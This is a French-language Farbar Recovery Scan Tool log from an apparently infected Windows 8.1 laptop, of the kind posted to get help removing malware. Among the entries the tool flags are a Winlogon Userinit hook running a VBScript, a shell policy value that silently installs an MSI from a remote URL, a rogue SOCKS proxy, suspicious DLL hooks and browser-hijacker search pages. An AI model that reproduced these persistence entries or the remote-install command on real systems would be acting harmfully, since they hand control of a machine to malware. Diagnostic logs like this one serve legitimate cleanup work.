Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 21.07.2018
Exécuté par Diane.K (administrateur) sur PC (26-07-2018 23:50:56)
Exécuté depuis C:\Users\pc1\Desktop
Profils chargés: Diane.K (Profils disponibles: Diane.K)
Platform: Windows 8.1 (Update) (X64) Langue: Français (France)
Internet Explorer Version 11 (Navigateur par défaut: "C:\Program Files (x86)\Bookness\Application\chrome.exe" "%1")
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files (x86)\Explorer\iedvutils.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\Realtek\REALTEK Bluetooth\BTDevMgr.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
(Intel(R) Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
() C:\ProgramData\MobileBrServ\mbbService.exe
() C:\ProgramData\MTN Online\OnlineUpdate\ouc.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(SplitCam Co.) C:\Program Files (x86)\SplitCam\SplitCamService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(DEVGURU Co., LTD.) C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(TorchMedia Inc.) C:\Users\pc1\AppData\Local\Torch\Update\TorchCrashHandler.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler64.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
() C:\Program Files (x86)\No-IP\ducservice.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Farbar) C:\Users\pc1\Desktop\farbar-recovery-scan-tool-64-bits_19-07-2018_fr_432987_64.exe
==================== Registre (Avec liste blanche) ===========================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7636696 2014-09-03] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1396592 2014-09-02] (Realtek Semiconductor)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2818800 2014-09-17] (Synaptics Incorporated)
HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [161728 2015-08-09] (IvoSoft)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [gplyra] => C:\Users\pc1\AppData\Roaming\gplyra\gplyra.exe [1541120 2017-02-25] () <==== ATTENTION
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [303928 2017-05-09] (Apple Inc.)
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE [312376 2011-11-15] (Power Software Ltd)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe [624248 2007-05-10] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs,
HKLM-x32\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs,
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [background_fault] => C:\Users\pc1\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [50097088 2018-04-09] (Skype Technologies S.A.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [CyberGhost] => C:\Program Files\CyberGhost 6\CyberGhost.exe [1248848 2017-08-31] (CyberGhost S.A.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [ultracopier] => C:\Program Files (x86)\Ultracopier\ultracopier.exe [1200640 2016-01-02] (ultracopier.first-world.info)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [Chromium] => c:\users\pc1\appdata\local\chromium\application\chrome.exe [829440 2017-02-15] (The Chromium Authors)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [GoogleChromeAutoLaunch_622FDC5463774A77AFAA15FA9986B0E8] => C:\Program Files (x86)\Fanlook\Application\chrome.exe [976216 2017-05-09] (Google Inc.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [GoogleChromeAutoLaunch_2618C502D38230C292A5E9A82228B6CF] => C:\Program Files (x86)\Standuck\Application\chrome.exe [945496 2017-02-01] (Google Inc.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1QOWYyRjNYOYU8MUI4M8I5OTNYFUUyOUJSFjI4FdEdRF== /q <==== ATTENTION
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {0965f634-1840-11e6-82a4-d260c8b66546} - "F:\VZW_Software_upgrade_assistant.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {48766fca-175a-11e5-8265-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {534d2c4f-19f6-11e5-8267-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {55344e8a-eb00-11e6-82c2-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {6d4ddff3-c023-11e5-828c-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {b14a5c19-f83b-11e5-829f-2c337a8bf3d0} - "C:\Windows\system32\RunDLL32.EXE" Shell32.DLL,ShellExec_RunDLL F:\index.html
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {b14a72bc-f83b-11e5-829f-2c337a8bf3d0} - "H:\TL-Bootstrap.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {ea1be95e-c083-11e5-828e-d260c8b66546} - "G:\LG_PC_Programs.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f2dda7bd-0d77-11e5-8261-2c337a8bf3d0} - "G:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f2ddacce-0d77-11e5-8261-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f2ddad47-0d77-11e5-8261-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f959f036-cdee-11e5-8297-d260c8b66546} - "F:\autorun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f959f073-cdee-11e5-8297-d260c8b66546} - "F:\autorun.exe"
HKLM\...\Providers\h9kafbc6: C:\Program Files (x86)\Juqgehuwuk Cache\local64spl.dll <==== ATTENTION
ShellExecuteHooks: Pas de nom - {7FBEA058-DE40-11E6-83E9-64006A5CFC23} - C:\Users\pc1\AppData\Roaming\Kowelystzother\Shuquty.dll [149504 2017-01-27] () <==== ATTENTION
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
ProxyServer: [S-1-5-21-813913080-1538114768-4122880109-1001] => socks=78.52.139.219:16749
Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{25F21A04-496A-486E-B7EF-BCA67E497234}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{57054E79-181C-49B1-A338-5D6100939F1C}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{6E78D00F-6396-4B3D-AB08-10811C20830E}: [DhcpNameServer] 10.111.166.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131522678056251301&GUID=BC898F91-C0BF-4DE0-B05E-EA8849371D03
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131522678056257360&GUID=BC898F91-C0BF-4DE0-B05E-EA8849371D03
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp13.msn.com
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1488877008&z=91d1f1b5712ad739685e82dgcz0b8b1bfm3m5eae9e&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1488877008&z=91d1f1b5712ad739685e82dgcz0b8b1bfm3m5eae9e&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {AC3D1C0A-A641-4637-8303-B03C2AF8D303} URL = hxxp://www.amazon.fr/s/ref=azs_osd_ieafr?ie=UTF-8&tag=hp-fr2-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-813913080-1538114768-4122880109-1001 -> {2B5F0F25-5F7C-49BD-A1F2-75D620BC58A0} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H2Kzamobl7428xAU,5288a185-ab92-4e3c-adf8-aacc1557d732,
SearchScopes: HKU\S-1-5-21-813913080-1538114768-4122880109-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
SearchScopes: HKU\S-1-5-21-813913080-1538114768-4122880109-1001 -> {AC3D1C0A-A641-4637-8303-B03C2AF8D303} URL = hxxp://www.amazon.fr/s/ref=azs_osd_ieafr?ie=UTF-8&tag=hp-fr2-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll [2015-08-09] (IvoSoft)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-07-04] (HP Inc.)
BHO: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_64.dll [2015-08-09] (IvoSoft)
BHO-x32: Aide pour le lien d'Adobe PDF Reader -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2006-10-22] (Adobe Systems Incorporated)
BHO-x32: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll [2007-03-27] (Adobe Systems Incorporated.)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll [2015-08-09] (IvoSoft)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-07-25] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2007-05-10] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-04] (HP Inc.)
BHO-x32: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_32.dll [2015-08-09] (IvoSoft)
Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2015-08-09] (IvoSoft)
Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2015-08-09] (IvoSoft)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2007-05-10] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll [2007-03-27] (Adobe Systems Incorporated.)
FireFox:
========
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\0nvqk2dc.default\Profiles\0nvqk2dc.default [non trouvé(e)] <==== ATTENTION
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\naweriweentcofise\Profiles\0nvqk2dc.default\Profiles\0nvqk2dc.default [non trouvé(e)] <==== ATTENTION
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default [2018-04-27]
FF Homepage: Mozilla\Firefox\Profiles\0nvqk2dc.default -> hxxps://www.google.com/?bcutc=sp-006
FF NewTab: Mozilla\Firefox\Profiles\0nvqk2dc.default -> about:newtab
FF Extension: (Fast search) - C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\Extensions\amcontextmenu@loucypher [2017-01-27] [Legacy]
FF Extension: (Firefox Hotfix) - C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-11-26] [Legacy]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\amisites.xml [2017-02-08]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\google-avast.xml [2018-03-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\h9kafbc6.xml [2017-01-27]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\ourluckysites.xml [2017-05-31]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\smod.xml [2017-02-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\startpageing123.xml [2017-03-31]
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default [2017-09-26] <==== ATTENTION
FF Homepage: Firefox\Firefox\Profiles\0nvqk2dc.default -> hxxp://www.searchinme.com/
FF NewTab: Firefox\Firefox\Profiles\0nvqk2dc.default -> hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=h2kzamobl7428xau,5288a185-ab92-4e3c-adf8-aacc1557d732,
FF NetworkProxy: Firefox\Firefox\Profiles\0nvqk2dc.default -> autoconfig_url", "data:text/javascript,%2F*windscribe*%2Ffunction%20FindProxyForURL(url%2C%20host)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20(isPlainHostName(host)%20%7C%7C%20%20shExpMatch(host%2C%20%22*.local%22)%20%7C%7C%20shExpMatch(host%2C%20%22*.int%22)%20%7C%7C%20shExpMatch(url%2C%20%22*%3A%2F%2Fapi.windscribe.com%2F*%22))%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%22DIRECT%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20lanIps%20%3D%20%2F(%5E127.)%7C(%5E192.168.)%7C(%5E10.)%7C(%5E172.1%5B6-9%5D.)%7C(%5E172.2%5B0-9%5D.)%7C(%5E172.3%5B0-1%5D.)%2F%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if(lanIps.test(host))%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%22DIRECT%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20(url.substring(0%2C%205)%20%3D%3D%20'http%3A'%20%7C%7C%20url.substring(0%2C%206)%20%3D%3D%20'https%3A'%20%7C%7C%20url.substring(0%2C%204)%20%3D%3D%20'ftp%3A'%20%7C%7C%20url.substring(0%2C%203)%20%3D%3D%20'ws%3A')%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%22HTTPS%20ext-start.windscribe.com%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20'DIRECT'%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D"
FF Extension: (SimilarWeb) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-03-29] [Legacy] [non signé]
FF Extension: (FF Adr) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-03-29] [non signé]
FF Extension: (Windscribe) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\@windscribeff.xpi [2017-06-22] [Legacy]
FF Extension: (Fast search) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\amcontextmenu@loucypher [2017-02-22] [Legacy]
FF Extension: (Français Language Pack) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\langpack-fr@firefox.mozilla.org.xpi [2017-05-19] [Legacy] [non signé]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\amisites.xml [2017-02-08]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\h9kafbc6.xml [2017-01-27]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\smod.xml [2017-02-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\startpageing123.xml [2017-02-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\startsearch.xml [2017-05-19]
